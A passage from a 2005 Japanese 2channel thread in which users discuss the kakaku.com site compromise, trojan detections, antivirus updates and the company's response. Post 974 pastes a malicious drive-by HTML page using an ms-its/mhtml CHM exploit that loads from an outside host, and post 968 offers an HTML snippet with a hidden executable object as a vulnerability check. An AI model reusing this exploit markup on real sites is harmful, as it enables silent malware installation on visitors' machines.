パターン問題は自業自得だが。

914 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:22:50
だからIEでNOD入れたやつ、通信ログ見てみろって
おかしいから動きが、
エラーでまくりだぞ

915 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:23:04
前の100%は言い訳できない大失態だがこれは関係ないだろ


916 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:23:12
そんなことより、おんなじ脆弱性を突かれて乗っ取られる可能性のあるサイトが他にも有るって事でしょ?
どんなページには気をつけたらいいの?


917 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:23:16
気の毒だね。
日本語ウイルス対策のためにも残ってもらわねばならない企業だが。
シマンテック独占になるのはちとまずいし不安も増す。
ってどっちも使ってないんだがw

918 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:23:34
>>911
【追記 21:10】
トレンドマイクロによれば「trojandownloader.small.AAOはインストーラの役割を担っており、
レジストリの改竄などウイルス活動は行なわない」という。従って、トレンドマイクロの
駆除ツールを利用してDELF.RMを駆除した後、trojandownloader.small.AAOがNOD32で
検出されても「検出されたファイルを削除することで対処可能だ」としている。

---------------

つーことは、トレンドマイクロもノートン先生も完全に対応ってことですな。

919 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:25:23
みたいね
一安心かな

920 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:30:17
ttp://securityresponse.symantec.com/avcenter/venc/data/trojan.esteems.d.html
コイツは関係あるのかな・・・?

921 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:33:33
今日ずっとノートンスキャンしまくってるよ・・・('A`)
アップデートして、またアップデート情報きて・・・またスキャン・・・
今日は呪われてるな

922 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:39:33
ノートン5/16定義来たがどうよ

923 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:40:08
>>903
未だにいち早くNOD32で駆除可能とわかった経緯が不明?
トレンドマイクロを使っていたのなら、余計に不可解。
上場企業の説明にしては子供騙しに近い会見内容。
サーバーへのログインはどうしてたのか?とか、
もっと明らかにする内容があるだろ。ゴルァ

924 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:40:29
Start time : 月 5 16 2005 21:31:12
Load Damage Cleanup Template (DCT) "C:\Documents and Settings\木下桜\デスクトップ\fix_delfRM\tsc.ptn" (version 999) [success]
Complete time : 月 5 16 2005 21:31:12
Execute pattern count(1), Virus found count(2), Virus clean count(2), Clean failed count(0)

これって感染していたのでしょうか?
今日知らずにネットトレードしていたのですがやはりパスワードなどは変更しておくべきでしょうか?

925 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:40:38
avastいま定義ファイル自動アップデート来たぞ
対応したかな?

926 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:41:22
>>924
最後の一行くらい読めよ・・・

927 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:42:44
>>924
木下桜さん、多分感染しているんではないでしょうか。
私の場合は
Complete time : 月 5 16 2005 21:41:41
Execute pattern count(1), Virus found count(0), Virus clean count(0), Clean failed count(0)

928 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:42:53
>>924
ウホッ!

トレンドマイクロの詳細見ると80ポートで繋ぎに逝く外のサイトはその時点で
閉鎖済みだったそうだけど。他に流出先有ったのかね?


929 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:43:00
ノートンのフルシステムスキャン掛けたが
なんともなかった。これでもいかんの?

930 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:43:37
うわぁぁぁぁ!名前晒してる・・・・

931 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:43:44
>>924
さくらタン完全にクロだよさくらタン

932 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:44:05
>>929
定義ファイルが最新ならOKのようです。恐らく。

933 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:44:25
>>924
証拠保全しておいた方が後々良いかも?

934 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:44:56
木下桜は釣りだよな?

935 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:46:00
http://internet.watch.impress.co.jp/cda/news/2005/05/16/7610.html
>対応策として改竄されたページを人手で修正する“いたちごっこ”が続いたが、
>14日になって改竄頻度が急増。修正が間に合わなくなったため、全システムをダウンさせ、

>「インターネット関連企業として“最高のセキュリティ対策”を施していた」。

ワロス

936 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:46:06
本名です・・・

937 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:46:08
>>934
ニュー速+の二番煎じっぽいタイミング(あっちも釣り堀だが)
なおかつ名前も怪しい

938 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:46:48
>>822
576 :名無しさん@お腹いっぱい。 [sage] :2005/05/16(月) 21:41:06
LiveUpdateの奴で a01.css から a10.css まで検出できますた

939 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:47:08
kakaku.comにマカフィーはどうなってんだよ( ゚Д゚)ゴルァ!!ってメールしたけど帰ってこない・・・orz

940 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:48:05
>>935
アホーBBを凌ぐ杜撰な管理、運営をしていた気配。

941 :938:2005/05/16(月) 21:48:06
>>822 じゃなくて >>922

942 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:48:37
>>924
ネットトレード用のパスワードは念のため変更した方がいいかも。
なんせキーロガーをしこむ相手だし。

943 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:48:53
>936
( ゚Д゚) …。それをわざわざ・・・。
やっぱりクマー???

944 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:49:06
木下桜って本名
お住まいはどちら?

柳下蛙

945 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:49:24
感染してなかった
OKOK、俺様最強

946 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:50:37
>945 何で調べた?

947 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:50:42
>>633 F-Secureの人も検知したね (^o^)

SERVICE_TYPE: http
VIRUS_NAME: Trojan-PSW.Win32.Delf.fz
VIRUS_INFO_URL: http://www.f-secure.co.jp/vs?vn=Trojan-PSW.Win32.Delf.fz
METHOD: GET
URL: http://www.j4sb.com/count/data/a05.css
CONTENT_TYPE: text/css
CONTENT_LENGTH: 41788
TIME: 1116247350.904
TIME_STR: 2005-05-16 21:42:30 (+0900)


948 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:52:13
>>936
とりあえずログ取っとけ。証拠として。トレーディングしてならけっこーやばいんでないか?
大事なIDやPASSはさっさと変更したほうがいいんじゃねーの。

949 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:53:53
>>948
そうします。
ご親切にありがとうございました。
ここはいい人ばかりですね

950 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:56:19
>>923
11日の時点でNOD32使っている奴から価格におかしいよって通報があったらしいよ。

951 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:56:52
大変だぁ〜、カカクコムのサイトが落ちたらしいぞ....













って騒いでた土曜日が懐かしい

952 :名無しさん@お腹いっぱい。:2005/05/16(月) 21:59:11
価格.comのどのページに仕掛けてあったんだ?

953 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:00:17
>>903
TrendってFireWall製品出してたっけ?と思った。
ウィルススキャンだけがセキュリティじゃないし何より侵入手口を見るために
価格.comを見に来る人に被害を与えたかもしれない事とか言及しないで
閉鎖の理由が「修正が間に合わなくなったため」って自分の事しか考えてないのね。

954 :923:2005/05/16(月) 22:02:16
> NOD32を利用するユーザーからの問い合わせでサイトの改竄に気付いた

これでNOD32で駆除可能と判断したわけだな?

955 :929:2005/05/16(月) 22:03:33
>>932
わかりました。念のためライブアップデートしてから
再度スキャン掛けてみます。

956 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:03:34
>>953
単にiespyadでkakaku.comが制限付きサイトに登録されるだけだから w

957 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:03:40
>>935
最高のセキュリィティ 笑った

最高かもしれないが結果的に野放しにして撒き散らした
責任はどう取るんだろうね
仕方なかったっていういいかたしてるけど

958 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:04:42
>>953
お子ちゃま達が時流に乗って社会的責任の自覚がないまま会社経営してそう。

959 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:04:56
>「警察や弁護士などと相談した上で、11日にサイトを閉鎖してしまえば犯人の侵入経路もわからず・・・
って・・・

何も知らない一般人を釣りえさに使ったのかよ・・・orz
実害出た場合、どこを訴えるんじゃい?

960 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:06:56
>>959
利用者はおとり捜査の道具にされたってわけか?ゴルァ

961 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:07:59
>>935
最高のセキュリティ対策とは
ネットに接続しないことだろーがwwwwwww

と言いたいwwwwwwwwwwwwwwww

962 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:08:49
>>961
HP閉鎖したときのこといっているのかと思われ

963 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:10:01
シマンテックもようやくウイルス定義ファイルバージョン: 70516g



964 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:10:08
>>959
それが本当なら、その後に被害にあった人は賠償訴訟すれば勝てるだろうな

965 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:11:08
これってジャバスクリプト切ってれば大丈夫だったの?

966 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:11:25
巨人球団のHPのアドレスはhttp://www.giants.jp/top.html

967 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:11:43
弁護士の名前の公表、キボンヌ

968 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:13:47
【感染資格者チェック方法】

<HTML><HEAD><TITLE>。。</TITLE></HEAD><BODY><OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobject" CODEBASE="%23.exe"></OBJECT></BODY></HTML>

テキストファイルに↑をコピペしてkakaku.htmにしてデスクトップに保存します。
一応デスクトップに#.EXEが無いことを確認してkakaku.htmをダブルクリックします。
ブラウザが開いた時に「現在のセキュリティ設定では〜」の警告が出ます。

もしもこの警告が出ない人で、価格ドットコムを11日以降に
見ていたその人は感染者でしょう。

969 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:13:48
>>964
不作為ってヤツだね。
感染する恐れがあるのを知ってて放置した。

970 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:15:34
予想

11日にセキュリティ担当が不正進入の痕跡を発見する

カカクコムのセキュリティ対応の外注(canon-sol?)に調査依頼

ウイルス発見し、検体の提供をを受ける、即日11日にNOD32で対応

調査と称して放置
(やばいけど、どうしよう?わかんねーし、外注にまかせとけばいいだろw)

中国人(ウハッ、すげー便利な鯖みつけたwww)

悪化

どうしようもなくなって鯖停止

971 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:17:27
だんだん頭にきた
三菱や雪印と同じじゃねーかーーーーーーーーーーー

パソコン売らなかったから怒る ってレベルの問題じゃないぞ

人をコケにしやがって、感染した奴だけなないぞ
その期間に価格覗いた奴だって相当な時間を費やすことになっている。
メアドも漏れてるだろ?????????????

とっとと閉鎖して情報公開すべき 何が原因追及まで2週間だーーーーーーー

とっととと公開しろ イラつく

972 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:20:04
「問い合わせの件数はこれまでに個人で約300件」てたいしたこと無いと思ってんじゃないだろうか?
この件で翻弄された人数をしらしめたい

973 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:20:34
どうしてページ見ただけで感染なんだ?
俺も見ておかしかったんだが。
ノートは、変なウインドウズダウンロードをダウンロードしろと、ダイアログでてたんだけど、
それと関係ある?


974 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:21:10
<script language="JavaScript">
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "cn") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "zh") document.location = "http://awmcash.biz/adverts/nafig.html";
</script>
<html>
<head>
<title></title>
</head>
<body>
<applet CODE="BlackBox.class" width=1 height=1></APPLET>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/x-scriptlet"></object>
</body>
</html>

975 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:21:11
>>973
過去レスよめー

976 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:21:33
またスクリプト嵐かよ…

977 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:22:47
>>973
バッファオーバーフローの脆弱性だ
にちゃんに来てそんな事も知らないのかよ
ダークロリータサイトと同じスクリプトコード

978 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:24:05
>>977
バッファオーバーフローじゃねえよ、知ったか厨。

979 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:26:19
で実際のところ何なんだ?

980 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:27:28
あまり詳しくないのですが、既知のものなんですか?kbに出ていますか?

981 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:27:33
CHM だろ。

982 : ◆Er8dXPUpi2 :2005/05/16(月) 22:28:40
実際良い宣伝になったと思うよ。価格コムの。


さっきニュースで見たが、実際問題価格コムがニュースに出るなんざ、普通ないからな。

983 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:29:11
kakaku.comのセキュリティ関連の製品構成が知りたいな。

誰かこっそり教えてよ。導入事例探したけど見つからなかった

984 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:30:32
>>978
おめえの方が知るらなそうだな
Download Jectを調べて来い
どっかのソースにMS04-013らしいと書いてあったな
恥かくぞ! バカ

985 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:32:21
>>983
よくわからんが、トレンドマイクロ製のウイルス対策ソフト使ってたらしい。
ttp://www.itmedia.co.jp/news/articles/0505/16/news077.html

986 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:32:59
>>984 プププ

987 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:33:01
>>978
ちゃんと調べたか? 理解できとるのか?

988 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:33:08
次スレよろ

989 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:33:19
↓は関係ないの?あると思いまくってた。

http://jvn.jp/cert/JVNTA04-099A/

990 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:33:41
>>983
http://www.trendmicro.com/jp/products/smbsolution/overview.htm

たぶん、こういうのだろ。もっと大規模なやつかもしらんし。

991 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:38:08
>>990
メール用?

992 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:38:39
>>990
その絵を見ると守るのはあくまでクライアントPCであって
Webサーバやメールサーバを守るとは書いてない。
しかもウィルスからしか守らないので今回の件とは違うかも。
もしかしたらウィルスに感染していてバックドア仕掛けられてたのかも知れないけど。

993 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:39:40
普通に考えると、原因はCGIの脆弱性とかだろうね。

994 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:39:54
>>985
RealSecureとか使ってないのかな?
犯人がその気になれば、他の企業も同様にやられてしまうんだろうか?
価格.comだったら、それなりの対策はしているんでしょ?

995 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:41:24
>>991
中小企業用パッケージだな。ファイルサーバ用だとこんなのとか。

http://www.trendmicro.com/jp/products/file-server/overview.htm

996 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:43:08
トレンドの宣伝うぜえ。

997 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:43:38
後4様

998 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:44:16
ぬるぽ

999 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:44:23
1000

1000 : ◆UWAAAAAA.. :2005/05/16(月) 22:44:24
999

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

230 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)